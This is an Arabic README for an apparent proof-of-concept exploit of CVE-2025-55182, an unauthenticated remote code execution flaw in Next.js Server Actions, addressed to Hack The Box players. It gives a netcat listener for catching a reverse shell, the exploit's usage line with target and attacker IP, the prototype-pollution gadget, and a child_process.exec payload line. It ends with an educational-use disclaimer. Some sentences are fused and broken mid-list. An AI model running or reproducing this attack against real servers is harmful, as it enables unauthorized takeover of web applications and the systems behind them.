
أعلم أنك على الأرجح هنا من Hack the Box، وإذا كان الأمر كذلك، فنعم هذا الأداة تعمل فعلاً.
إثبات مفهوم (PoC) لاستغلال CVE-2025-55182، يستهدف ثغرة تنفيذ الأكواد عن بُعد (RCE) غير المصادق عليها في Next.js Server Actions.
يستغل هذا السكربت تلوّث النموذج الأولي (prototype pollution) أثناء إلغاء تسلسل حمولات React Server Components (RSC) متعددة الأجزاء (multipart) لحقن أوامر ضارة في عملية Node.js باستخدام تدفق تنفيذ غير متزامن وغير حاجب.
child_process.exec() بدلاً من واجهات execSync() الحاجبة لمنع تعليق الخيوط على عقد الحاويات.requests الأصلية في Python.افتح طرفية على جهازك المهاجم وشغّل مستمع مقبس netcat لالتقاط الاتصال العكسي الوارد:
nc -lvnp 4444
قم بتوفير عنوان URL الأساسي للهدف، وعنوان IP لواجهة جهازك المحلي، ومنفذ المستمع المطلوب:
python3 exploit.py <target_url> <your_ip> [your_port]
python3 exploit.py http://website.whatever:port x.x.x.x 4444
يرسل السكربت حمولة multipart خام مصمّمة بعناية مباشرة إلى نقطة نهاية التوجيه الخاصة بالتطبيق مع ترويسة التوجيه Next-Action المطلوبة.
من خلال استغلال توقيعات إنشاء الكائنات عبر {"get":"$1:constructor:constructor"}، يلوّث محرك إلغاء التسلسل شجرة الكائنات الأصلية. وعند معالجة المعاملات المصاحبة، يفسّر كتلة سياق _response المضمنة بشكل خبيث كقائمة تعليمات، مما يسمح بتنفيذ الأكواد بصلاحيات سياق مستخدم خادم Node الجاري.
// الهدف الأساسي للناقل:
process.mainModule.require('child_process').exec('your_payload_here');
تم إنشاء هذا السكربت strictly للأغراض التعليمية، والاختبارات الأمنية المصرح بها، والتقاط الأعلام الثغرات في مختبرات مثل Hack The Box. المؤلف غير مسؤول عن أي إساءة استخدام، أو اختراق غير مصرح به للأنظمة، أو الأضرار الناجمة عن هذه الأداة.